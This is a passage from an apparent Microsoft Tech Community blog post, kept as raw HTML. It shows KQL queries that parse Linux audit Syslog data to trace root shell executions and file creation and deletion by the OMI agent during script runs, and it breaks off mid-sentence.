SCXW267943799 BCX8">=" * " success=" success " exit=" exit " a0" * "&nbsp;<BR /></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">ppid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">ppid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">pid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">pid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">audit_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">audit_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">auid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">auid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;" user=" user "&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;" group=" group <BR />" gid=" gid "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">effective_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">effective_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">euid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">euid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">set_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">set_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;" suid=" suid <BR />"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">filesystem_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">filesystem_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">fsuid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">fsuid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">effective_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">effective_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">egid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">egid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;<BR />"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">set_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">set_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">sgid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">sgid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">filesystem_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">filesystem_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">fsgid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">fsgid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">tty</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">tty</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;<BR />"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">ses</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">ses</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;" comm=\"" comm "\" exe=\"" exe "\"" * "cwd=\"" cwd "\"" * "name=\"" name "\"" * "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">cmdline</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">=\""&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">cmdline</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"\"" *</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | where&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;== '0'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | where cwd == '/var/opt/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">microsoft</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">scx</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">tmp</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | where comm ==&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">'sh</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | extend Timestamp =&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">TimeGenerated</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">,&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">HostCustomEntity</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;= Computer,&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">AccountCustomEntity</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;= user</SPAN></SPAN><SPAN class="EOP SCXW267943799 BCX8" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></SPAN></PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="executescript_kql_query_execution.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311949iC704AAECED655314/image-size/large?v=v2&amp;px=999" role="button" title="executescript_kql_query_execution.png" alt="executescript_kql_query_execution.png" /></span></SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN class="NormalTextRun BCX8 SCXW42733508">I was wondering what process had created that file in that directory. I ran the following query</SPAN><SPAN class="NormalTextRun BCX8 SCXW42733508">&nbsp;to answer that question</SPAN><SPAN class="NormalTextRun BCX8 SCXW42733508">:</SPAN></P> <P>&nbsp;</P> <PRE><SPAN class="NormalTextRun BCX8 SCXW42733508"><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">let<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscallsList</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>= dynamic(["unlink","</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">openat</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">","</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">chmod</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">"]</SPAN><SPAN class="NormalTextRun ContextualSpellingAndGrammarErrorV2 SCXW164422095 BCX8">);</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">Syslog</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| parse<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8 DefaultHighlightTransition">SyslogMessage</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>with "type="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun ContextualSpellingAndGrammarErrorV2 SCXW164422095 BCX8">audit(</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">" * "): "<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventData</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| where<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>=~ "AUOMS_SYSCALL" and<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventData</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>contains "/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">etc</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">/opt/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">microsoft</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">scx</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">/conf/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">tmpdir</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">/"</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| project<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">TimeGenerated</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">,<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">, Computer,<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventData</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| parse<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventData</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>with * "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscall_r</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">=" * " success=" success " exit=" exit " a0" * <BR />"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">ppid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">ppid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">pid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">pid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">audit_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">audit_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">auid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">auid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>" user=" user "<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>" group=" group <BR />" gid=" gid "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">effective_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">effective_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">euid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">euid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">set_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">set_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>" suid=" suid <BR />"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">filesystem_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">filesystem_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fsuid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fsuid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">effective_group</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">effective_group</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">egid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">egid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;<BR /></SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">set_group</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">set_group</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">sgid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">sgid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">filesystem_group</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">filesystem_group</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fsgid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fsgid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">tty</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">tty</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;<BR /></SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">ses</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">ses</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>" comm=\"" comm "\" exe=\"" exe "\"" * "cwd=\"" cwd "\"" * "name=\"" name "\"" *<BR /> "<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_name</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_name</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_nametype</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_nametype</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_mode</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">=" * "<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">proctitle</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">cmdline</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>" redactors=" *</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| where<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>in (</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscallsList</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">)</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| extend<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fileAction</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>= (</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">parse_json</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">(</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_nametype</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">))[1]</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| where<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fileAction</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>in ("CREATE","DELETE")</SPAN></SPAN><SPAN class="EOP SCXW164422095 BCX8" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></SPAN></PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="executescript_kql_query_file_creation_deletion.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311951iC7B4DD01AF96E6A3/image-size/large?v=v2&amp;px=999" role="button" title="executescript_kql_query_file_creation_deletion.png" alt="executescript_kql_query_file_creation_deletion.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN class="TextRun SCXW138185179 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW138185179 BCX8">It seems that the<SPAN>&nbsp;</SPAN></SPAN></SPAN><STRONG><SPAN class="TextRun SCXW138185179 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SpellingErrorV2 SCXW138185179 BCX8">omiagent</SPAN></SPAN></STRONG><SPAN class="TextRun SCXW138185179 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW138185179 BCX8">&nbsp;creates and deletes the file.</SPAN><SPAN class="NormalTextRun SCXW138185179 BCX8">&nbsp;The</SPAN><SPAN class="NormalTextRun SCXW138185179 BCX8">&nbsp;</SPAN><SPAN class="NormalTextRun SCXW138185179 BCX8">f</SPAN><SPAN class="NormalTextRun SCXW138185179 BCX8">ile is available only during the execution of the script. Once the execution is done, the file gets deleted.</SPAN><SPAN class="NormalTextRun SCXW138185179 BCX8">&nbsp;After doing</SPAN></SPAN><SPAN class="TextRun SCXW138185179 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW138185179 BCX8"><SPAN>&nbsp;</SPAN>some more research and reading<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW138185179 BCX8">some of&nbsp;</SPAN><SPAN class="NormalTextRun SCXW138185179 